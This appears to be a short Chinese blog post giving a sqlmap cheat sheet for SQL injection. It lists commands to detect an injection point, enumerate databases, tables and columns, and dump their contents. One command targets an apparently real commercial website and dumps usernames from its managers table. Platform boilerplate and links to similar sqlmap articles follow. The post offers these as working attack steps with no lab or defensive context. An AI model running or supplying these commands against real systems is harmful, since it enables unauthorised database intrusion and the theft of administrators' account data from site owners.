一些神奇的代碼

sqlmap.py -u url 驗(yàn)證是否為注入點(diǎn)
sqlmap.py -u url --dbs 列出數(shù)據(jù)庫系統(tǒng)的數(shù)據(jù)庫
sqlmap.py -u url --tables -D db_name 列舉數(shù)據(jù)庫表

sqlmap.py -u url --columns -T table_name -D db_name 列舉數(shù)據(jù)庫表中的字段

sqlmap.py -u url --dump -C columns_name -T tables_name -D db_name 列舉出字段值

./sqlmap.py -u "http://www.calin.com.tw/ab.php?id=1&item_id=3" --dump -C username --columns -T managers_tw -D dbcalin

https://zhuanlan.zhihu.com/p/36336483
https://www.cnblogs.com/anka9080/p/sqlmap.html

image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • sqlmap用戶手冊(cè) 說明:本文為轉(zhuǎn)載,對(duì)原文中一些明顯的拼寫錯(cuò)誤進(jìn)行修正,并標(biāo)注對(duì)自己有用的信息。 ======...
    wind_飄閱讀 2,207評(píng)論 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當(dāng)給sq...
    xuningbo閱讀 10,562評(píng)論 2 22
  • sqlmap是一個(gè)開源的滲透測(cè)試工具,可以用來進(jìn)行自動(dòng)化檢測(cè),利用SQL注入漏洞,獲取數(shù)據(jù)庫服務(wù)器的權(quán)限。它具有功...
    道書簡(jiǎn)閱讀 1,568評(píng)論 0 0
  • sqlmap也是滲透中常用的一個(gè)注入工具,其實(shí)在注入工具方面,一個(gè)sqlmap就足夠用了,只要你用的熟,秒殺各種工...
    查無此人asdasd閱讀 1,618評(píng)論 0 1
  • sqlmap也是滲透中常用的一個(gè)注入工具,其實(shí)在注入工具方面,一個(gè)sqlmap就足夠用了,只要你用的熟,秒殺各種工...
    linkally閱讀 7,200評(píng)論 1 40

友情鏈接更多精彩內(nèi)容